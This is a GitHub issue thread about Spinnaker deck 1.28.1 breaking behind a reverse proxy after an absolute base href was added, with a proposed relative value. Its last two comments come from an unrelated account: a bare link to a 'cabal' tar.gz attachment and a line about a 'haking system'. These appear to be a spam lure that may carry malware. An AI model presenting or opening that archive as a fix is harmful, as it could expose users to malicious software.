### ISSUE TITLE
Spinnaker deck 1.28 failing behind a reverse proxy

### ISSUE THREAD

**Issue by mat-613** [spinnaker/spinnaker#6723]
Hi after upgrading my spinnaker to the 1.28.1 it stops working.

After investing a lot the problem is in the pull request: https://github.com/spinnaker/deck/pull/9802 where has been added in the packages/app/index.deck a base href that not consider relative url but just absolute.

I have a spinnaker exposed behind a reverse proxy, so the url of ui is something like https://zz.com/spinnaker/ and the url of api is https://zz.com/spinnaker-api/.
With the `<base href="/">` that has been added in packages/app/index.deck all the fetch request for the static resources are going to https://zz.com/ without the second part.

Why has been added this base href index.deck? Maybe it's more appropriate to insert something like that:

`<base href="./">`

Let me know, i can't upgrade my ten instances of spinnaker without a resolution!

Thank you

### Additional Details:
Spinnaker 1.28.1

**Comment by vitomanu96** [comment]
@mat-613 I've h ad the same problem! I am waiting for a fix

**Comment by bustamanteharvey364-prog** [comment]
[cabal-3.12.0-0.tar.gz](https://github.com/user-attachments/files/22742686/cabal-3.12.0-0.tar.gz)

**Comment by bustamanteharvey364-prog** [comment]
ineed to restore my haking system
